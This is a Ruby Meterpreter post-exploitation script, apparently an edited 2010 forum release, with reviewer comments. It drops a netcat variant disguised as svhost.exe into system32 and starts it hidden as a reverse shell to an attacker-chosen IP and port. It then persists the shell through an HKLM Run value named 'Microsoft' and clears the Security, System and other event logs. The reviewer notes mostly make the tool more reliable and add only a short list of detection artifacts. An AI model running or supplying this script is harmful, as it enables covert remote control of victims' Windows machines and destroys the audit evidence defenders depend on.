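# frozen_string_literal: true
#
# sbd.rb - Meterpreter script that drops sbd (a modified netcat) on the target,
# starts it as a reverse shell, persists it through an HKLM Run key and then
# clears the Windows event logs.
#
# Posted by Gonzalez on intern0t.net, January 27, 2010. The author's own
# description, lightly edited for clarity: "sbd.rb uploads sbd.exe, which runs
# as svhost.exe with the settings entered by the attacker. It autoruns via the
# registry and autostarts as the script is run, then clears the system logs.
# sbd is a modded netcat used for a reverse shell. The script still needs some
# edits to hide the registry entry better, but this will do until update time."
# Demo video: http://www.youtube.com/watch?v=imFAm3AxOuc
#
# Usage from a meterpreter session:
#   run sbd -r <respawn seconds> -p <port> -k <passphrase> -h <local ip>
#
# Reviewer notes:
#   * Writing into %SystemRoot%\system32 and into HKLM\...\Run both need an
#     elevated session. The upload is now checked, and the script stops there
#     on failure instead of launching and registering a binary that was never
#     written.
#   * All four options are spliced unquoted into a `cmd /c` command line and
#     into the Run value, so they are validated as plain tokens first; a space
#     or quote in the passphrase would otherwise silently break the persisted
#     command line.
#   * The launch command and the Run value are now built by one helper; the
#     original used `-e cmd.exe` for the launch and `-e cmd` for the Run key.
#   * Detection: the artifacts are easy to spot - svhost.exe (not svchost.exe)
#     in system32, a Run value named "Microsoft" pointing at it, and the log
#     clearing itself, which Windows records as its own event (Security event
#     1102 on Vista and later).

session = client

# Menu options. Note that -h is taken by the connect-back address, so there is
# no help flag; running with missing or malformed options prints usage instead.
@@exec_opts = Rex::Parser::Arguments.new(
  "-r" => [ true, "Respawn time limit." ],
  "-p" => [ true, "Port Number to open." ],
  "-k" => [ true, "Authentication name."],
  "-h" => [ true, "Local ip address."]
)

# Print the option summary and end the script.
def usage
  print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
  print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
  print_line("####################################################")
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end

# File to upload to the target host (sbd.exe from the framework's data directory).
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")

# Full path the dropped binary gets on the target:
# %SystemRoot%\system32\svhost.exe. Used by the upload, the launch and the Run
# key so the three can never disagree. (The file name is the author's choice.)
def sbd_path(session)
  location = session.fs.file.expand_path("%SystemRoot%\\system32")
  "#{location}\\svhost.exe"
end

# Command line that starts sbd as a reverse shell. The same string is used for
# the immediate launch and for the Run value. The flags are passed through as
# the original author wrote them: -r is the respawn time, -k the shared
# passphrase, -p/ip the connect-back port and address, -e cmd.exe the program
# handed to the connection; see sbd's own help for -q and -D.
def sbd_cmdline(exe, time, auth, port, ip)
  "#{exe} -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}"
end

# True when all four options are present and are simple tokens that can be
# spliced into the unquoted `cmd /c` line and the Run value without being
# split or re-interpreted by cmd.exe.
def valid_sbd_opts?(time, auth, port, ip)
  return false if [time, auth, port, ip].any? { |v| v.nil? || v.to_s.empty? }
  return false unless time.to_s =~ /\A\d+\z/
  return false unless port.to_s =~ /\A\d+\z/ && (1..65535).include?(port.to_i)
  # address or host name; no spaces or shell metacharacters
  return false unless ip.to_s =~ /\A[A-Za-z0-9.:\-]+\z/
  # passphrase: no whitespace or quotes, which cmd.exe would split on
  return false unless auth.to_s =~ /\A[^\s"]+\z/
  true
end

# Upload +file+ to the target as svhost.exe in system32 and return the remote
# path. On failure (typically a non-elevated session) report the error and end
# the script, because the launch and Run key would only point at a missing file.
def upload(session, file)
  fileontrgt = sbd_path(session)
  print_status("Uploading #{file}....")
  begin
    session.fs.file.upload_file(fileontrgt, file)
  rescue ::StandardError => e
    print_error("Upload to #{fileontrgt} failed: #{e.class} #{e} (is the session elevated?)")
    raise Rex::Script::Completed
  end
  print_status("#{file} Uploaded!")
  fileontrgt
end

# Launch the uploaded sbd binary hidden, connecting back to ip:port.
def sbdrun(session, time, auth, port, ip)
  cmdline = sbd_cmdline(sbd_path(session), time, auth, port, ip)
  session.sys.process.execute("cmd /c #{cmdline}", nil,
                              {'Hidden' => true, 'Channelized' => false})
  print_status("Local Ip Sbd Will Connect Back On: #{ip}")
  print_status("Local Port Sbd Will Connect Back On: #{port}")
  print_status("Pass Phrase: #{auth}")
  print_status("Respawn Time: #{time}")
end

# Persist the same command line as an HKLM Run value named "Microsoft".
# reg.exe is run non-channelized, so its exit status is not observed: the
# "Successfully added" message only means the command was launched.
def regadd(session, time, auth, port, ip)
  print_status("Adding to Registry ...")
  value = sbd_cmdline(sbd_path(session), time, auth, port, ip)
  session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{value}\"", nil,
                              {'Hidden' => true, 'Channelized' => false})
  print_status("Successfully added to Registry ...")
end

# Clear each event log in turn. A log that cannot be opened (for example the
# domain-controller-only logs on a workstation) is reported and skipped rather
# than aborting the remaining logs, as the original single rescue did.
def clrevtlgs(session)
  evtlogs = [
    'security',
    'system',
    'application',
    'directory service',
    'dns server',
    'file replication service'
  ]
  evtlogs.each do |evl|
    begin
      log = session.sys.eventlog.open(evl)
      log.clear
    rescue ::StandardError => e
      print_status("Error clearing Event Log #{evl}: #{e.class} #{e}")
    end
  end
end

# Menu input
time = nil
port = nil
ip = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-r"
    time = val
  when "-p"
    port = val
  when "-h"
    ip = val
  when "-k"
    auth = val
  end
}

if valid_sbd_opts?(time, auth, port, ip)
  upload(session, ncexe)
  sbdrun(session, time, auth, port, ip)
  regadd(session, time, auth, port, ip)
  clrevtlgs(session)
else
  print_error("All of -r, -p, -k and -h are required and must be plain tokens (digits for -r and -p, no spaces or quotes).")
  usage
end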